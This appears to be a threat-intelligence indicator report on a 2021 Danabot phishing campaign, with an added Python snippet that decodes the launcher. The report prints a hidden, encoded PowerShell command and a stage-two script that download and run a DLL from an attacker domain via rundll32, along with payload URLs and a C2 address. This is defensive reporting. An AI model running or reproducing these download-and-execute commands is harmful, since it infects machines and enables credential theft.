ExecuteMalware

2021-08-12 Danabot IOCs

Aug 12th, 2021 (edited)
THREAT IDENTIFICATION: DANABOT

SUBJECTS OBSERVED
Study the report very urgently - hV8W

SENDERS OBSERVED
raymak825@netvigator.com

ATTACHED MALDOC FILE HASHES
9789789.zip
e2dd6e94fcc2851d7e2258c8abe1faf5

Which contains:
12.08 - Reports.js
aeeef159543b28995b1f742085a2c6a0

POWERSHELL COMMAND FROM THE MALDOC
poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBiAG8AbgB1AHMAZQBzAGYAbwB1AG4AZAAuAG0AbAAvAHUAcABkAGEAdABlAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==

NEXT LEVEL MALDOC DOWNLOAD URL
http://www.bonusesfound.ml/update/index.php

This returns:
$path = $Env:temp '\ZGOPQv.bin'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://www.bonusesfound.ml/update/update.dll',$path); C:\Windows\System32\rundll32.exe $path,S

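Analyst-side decoding of the chain above, added here as an example and not part of the original paste: it decodes the -enc argument (base64 of the script as UTF-16LE text), normalises the launcher flags, and pulls the stage URLs and the rundll32 target out of both scripts. The alias table and the parsing helpers are this example's own simplifications (assumption), not PowerShell's real parameter-prefix rules.

```python
import base64
import re

# Stage-one command line and the stage-two script it fetches, copied from the report above.
STAGE1_CMDLINE = (
    "poWERshEll -nop -w hidden -ep bypass -enc "
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBiAG8AbgB1AHMAZQBzAGYAbwB1AG4AZAAuAG0AbAAvAHUAcABkAGEAdABlAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA=="
)
STAGE2_SCRIPT = (
    "$path = $Env:temp '\\ZGOPQv.bin'; $client = New-Object System.Net.WebClient; "
    "$client.downloadfile('http://www.bonusesfound.ml/update/update.dll',$path); "
    "C:\\Windows\\System32\\rundll32.exe $path,S"
)
URL_RE = re.compile(r"https?://[^\s'\"()]+")
RUNDLL_RE = re.compile(r"rundll32\.exe\s+(\S+?),(\w+)", re.IGNORECASE)
# Simplified alias table (assumption): real PowerShell accepts any unambiguous parameter prefix.
ALIASES = {"-nop": "-noprofile", "-w": "-windowstyle", "-win": "-windowstyle",
           "-ep": "-executionpolicy", "-ex": "-executionpolicy",
           "-e": "-encodedcommand", "-ec": "-encodedcommand", "-enc": "-encodedcommand"}
EVASIVE = {"-noprofile", "-windowstyle", "-executionpolicy", "-encodedcommand"}

def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries the script text as base64 of UTF-16LE."""
    return base64.b64decode(b64).decode("utf-16-le").rstrip("\x00")

def parse_stage1(cmdline: str) -> dict:
    """Normalise flag aliases and case, decode the -enc payload, and pull its URLs."""
    tokens = cmdline.split()
    flags, script = [], ""
    for i, tok in enumerate(tokens[1:], start=1):
        name = ALIASES.get(tok.lower(), tok.lower() if tok.startswith("-") else None)
        if name is None:  # a flag value such as "hidden" or "bypass", not a flag
            continue
        flags.append(name)
        if name == "-encodedcommand" and i + 1 < len(tokens):
            script = decode_encoded_command(tokens[i + 1])
    return {"flags": flags, "script": script, "urls": URL_RE.findall(script)}

def chain_summary(cmdline: str = STAGE1_CMDLINE, stage2: str = STAGE2_SCRIPT) -> dict:
    """One record per infection chain: evasion flags, stage URLs, and the rundll32 target."""
    s1 = parse_stage1(cmdline)
    m = RUNDLL_RE.search(stage2)
    urls2 = URL_RE.findall(stage2)
    return {"evasion_flags": sorted(EVASIVE & set(s1["flags"])),
            "stage1_url": s1["urls"][0] if s1["urls"] else None,
            "payload_url": urls2[0] if urls2 else None,
            "loader": (m.group(1), m.group(2)) if m else None}
```

The same functions run unchanged over process-creation log lines that record an encoded PowerShell launch, which makes the decoded URL available for blocking and retro-hunting.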
DANABOT PAYLOAD DOWNLOAD URL
http://www.bonusesfound.ml/update/update.dll

DANABOT PAYLOAD FILE HASHES
update.dll
c00d207efb855910154389b48404e550

Also renamed to (same hash):
AppData\Local\Temp\JWScY.bin
c00d207efb855910154389b48404e550

DANABOT C2
From the rundll32 process
https://192.52.167.44

SUPPORTING EVIDENCE
https://www.virustotal.com/gui/file/716e5a3d29ff525aed30c18061daff4b496f3f828ba2ac763efd857062a42e96/detection
https://app.any.run/tasks/042cafaf-f432-4332-8356-c3e04b55b701/